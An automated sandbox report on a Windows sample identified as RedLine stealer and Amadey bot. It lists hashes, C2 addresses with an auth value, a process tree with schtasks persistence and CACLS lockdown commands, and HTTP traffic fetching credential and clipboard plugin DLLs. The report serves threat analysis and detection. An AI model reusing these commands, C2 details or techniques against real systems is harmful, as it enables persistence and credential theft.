Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20221111-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    14/02/2023, 09:42 UTC

General

  • Target

    f5ad1e15e1211b60c066c1d924ff9c6a.exe

  • Size

    715KB

  • MD5

    f5ad1e15e1211b60c066c1d924ff9c6a

  • SHA1

    bd0abd13667843f4551c9b2940ec7b46ec811d02

  • SHA256

    ec7c4f05150f213e7be63cec7528aa7660acb543d4986c4e0aad7c90a2131889

  • SHA512

    d94662eaa93088ae89dd270b61f824bb5e3765c2402f30cd0d1f17401b431cc5df3eea112fddecb3329012d47365ce207b387acc2cad411d89158171830ee013

  • SSDEEP

    12288:4Mr7y90GH9osJXyscMZOqq2b+/1L0WSfAvD8aJPgHfLD1vr1bzgAnNMUkNj1m:TyHHNy7ca/14WAAvD8OOly4Mb4

Malware Config

Extracted

Family

redline

Botnet

fukia

C2

193.233.20.13:4136

Attributes
  • auth_value

    e5783636fbd9e4f0cf9a017bce02e67e

Extracted

Family

amadey

Version

3.66

C2

62.204.41.5/Bu58Ngs/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe
    "C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4876
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
            "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2752
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:4072
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                PID:5048
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "mnolyk.exe" /P "Admin:N"
                7⤵
                PID:3048
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "mnolyk.exe" /P "Admin:R" /E
                7⤵
                PID:2136
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                PID:1756
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "..\5eb6b96734" /P "Admin:N"
                7⤵
                PID:4216
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "..\5eb6b96734" /P "Admin:R" /E
                7⤵
                PID:4060
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
              6⤵
              • Loads dropped DLL
              PID:2944
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:368
  • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
    C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
    1⤵
    • Executes dropped EXE
    PID:2364
  • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
    C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
    1⤵
    • Executes dropped EXE
    PID:648

Network

  • flag-ru
    POST
    http://62.204.41.5/Bu58Ngs/index.php
    mnolyk.exe
    Remote address:
    62.204.41.5:80
    Request
    POST /Bu58Ngs/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 62.204.41.5
    Content-Length: 89
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 Feb 2023 09:42:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-ru
    GET
    http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll
    mnolyk.exe
    Remote address:
    62.204.41.5:80
    Request
    GET /Bu58Ngs/Plugins/cred64.dll HTTP/1.1
    Host: 62.204.41.5
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 Feb 2023 09:43:17 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
  • flag-ru
    GET
    http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
    mnolyk.exe
    Remote address:
    62.204.41.5:80
    Request
    GET /Bu58Ngs/Plugins/clip64.dll HTTP/1.1
    Host: 62.204.41.5
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 Feb 2023 09:43:17 GMT
    Content-Type: application/octet-stream
    Content-Length: 91136
    Last-Modified: Fri, 03 Feb 2023 16:52:27 GMT
    Connection: keep-alive
    ETag: "63dd3bcb-16400"
    Accept-Ranges: bytes
  • 193.233.20.13:4136
    kHp83aI.exe
    3.9MB
    53.2kB
    2878
    1175
  • 193.233.20.12:4132
    nmb57Na.exe
    260 B
    5
  • 62.204.41.5:80
    http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
    http
    mnolyk.exe
    3.8kB
    94.9kB
    76
    75
    HTTP Request
    POST http://62.204.41.5/Bu58Ngs/index.php
    HTTP Response
    200
    HTTP Request
    GET http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll
    HTTP Response
    404
    HTTP Request
    GET http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
    HTTP Response
    200
  • 72.21.81.240:80
    322 B
    7
  • 193.233.20.12:4132
    nmb57Na.exe
    260 B
    5
  • 104.80.225.205:443
    322 B
    7
  • 72.21.81.240:80
    322 B
    7
  • 72.21.81.240:80
    322 B
    7
  • 193.233.20.12:4132
    nmb57Na.exe
    260 B
    5
  • 193.233.20.12:4132
    nmb57Na.exe
    260 B
    5
  • 193.233.20.12:4132
    nmb57Na.exe
    260 B
    5
  • 193.233.20.12:4132
    nmb57Na.exe
    52 B
    1

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
    Filesize
    236KB
    MD5
    fde8915d251fada3a37530421eb29dcf
    SHA1
    44386a8947ddfab993409945dae05a772a13e047
    SHA256
    6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116
    SHA512
    ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
    Filesize
    612KB
    MD5
    7094ab66eeb5c57922739891f528af69
    SHA1
    4f0c74da394ab5d4098e797b429b29289a240b66
    SHA256
    69735b510790de25e419be9affb0d42fd4305d43dbd97f02433f6ae218387150
    SHA512
    e6bc6b0711e98a0dd27ce261eb981982484b37447deca9ccec9727f90f1b95a8b9c0b6f7ead88ecdce459441e0a7c13e39bbbb57dc83f349f7439dc329ae58fb

  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
    Filesize
    279KB
    MD5
    b7bb700e5a7a0c61fb93590366fe6ab9
    SHA1
    39a45f5aefb163427aa29ffcbdf130017cd52e62
    SHA256
    1516fc2758b409c7d53002665c888d62ac481d89679f4738c7d05cc672de319e
    SHA512
    605e922a2acb2008468dbe20f678b73af11a689d4081827f1ede264b4b9921b2579df2c56f70e196b793a5089805936a40aa1f886122ace11d05fb6259463319

  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
    Filesize
    286KB
    MD5
    43d2f820b61628a4b22d28b66f047c09
    SHA1
    5b3becd2e875d39476fe74c224f00b646a89bfb8
    SHA256
    96f3eed77fb20dccbb3b3c6878f3bd2d5910cd90ed95452a7e539b29896cb085
    SHA512
    d432aaaef84846b4cc206e10364d4fc435261890095654964b863788354d86768a2941b0174dbd6820c4c1d26ac92a5dd3535b370e108b86293c473c25655c63

  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
    Filesize
    175KB
    MD5
    a5f5c5d6291c7ae9e1d1b7ed1e551490
    SHA1
    3d06413341893b838549939e15f8f1eec423d71a
    SHA256
    1a09ce1cb64219a5d88e57845dc9ba6631efa06fccc8867ccf94eb132947563e
    SHA512
    d9b3ba67bdd615ee2ce91a29cd9cf6723464be27bf45186fd0e9559ff2b0e7c51b423cfc3e32b5e90955046fb75a34c4a8528df7294b6c831ca254a65d2b8ba2

  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
    Filesize
    236KB
    MD5
    fde8915d251fada3a37530421eb29dcf
    SHA1
    44386a8947ddfab993409945dae05a772a13e047
    SHA256
    6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116
    SHA512
    ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
    Filesize
    89KB
    MD5
    9221a421a3e777eb7d4ce55e474bcc4a
    SHA1
    c96d7bd7ccbf9352d50527bff472595b3dc5298e
    SHA256
    10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8
    SHA512
    63ac172cb19c7c020676937cb35e853710d08e99e06e8cdcb410c37e0c9056af409a50fdec0c90a3c532edcf5e0f128fa1e2181063e1208d4fc4643b1b5736f3

  • memory/368-171-0x0000000000850000-0x000000000089B000-memory.dmp
    Filesize
    300KB
  • memory/368-170-0x0000000000933000-0x0000000000962000-memory.dmp
    Filesize
    188KB
  • memory/368-172-0x0000000000400000-0x00000000007A1000-memory.dmp
    Filesize
    3.6MB
  • memory/368-173-0x0000000000933000-0x0000000000962000-memory.dmp
    Filesize
    188KB
  • memory/1684-143-0x0000000004BD0000-0x0000000004CDA000-memory.dmp
    Filesize
    1.0MB
  • memory/1684-144-0x0000000004B00000-0x0000000004B12000-memory.dmp
    Filesize
    72KB
  • memory/1684-152-0x00000000068A0000-0x00000000068F0000-memory.dmp
    Filesize
    320KB
  • memory/1684-151-0x0000000006820000-0x0000000006896000-memory.dmp
    Filesize
    472KB
  • memory/1684-150-0x0000000006AB0000-0x0000000006FDC000-memory.dmp
    Filesize
    5.2MB
  • memory/1684-149-0x00000000063B0000-0x0000000006572000-memory.dmp
    Filesize
    1.8MB
  • memory/1684-148-0x0000000004FB0000-0x0000000005016000-memory.dmp
    Filesize
    408KB
  • memory/1684-147-0x0000000005670000-0x0000000005702000-memory.dmp
    Filesize
    584KB
  • memory/1684-141-0x0000000000130000-0x0000000000162000-memory.dmp
    Filesize
    200KB
  • memory/1684-142-0x0000000005050000-0x0000000005668000-memory.dmp
    Filesize
    6.1MB
  • memory/1684-145-0x0000000004B80000-0x0000000004BBC000-memory.dmp
    Filesize
    240KB
  • memory/1684-146-0x0000000005C20000-0x00000000061C4000-memory.dmp
    Filesize
    5.6MB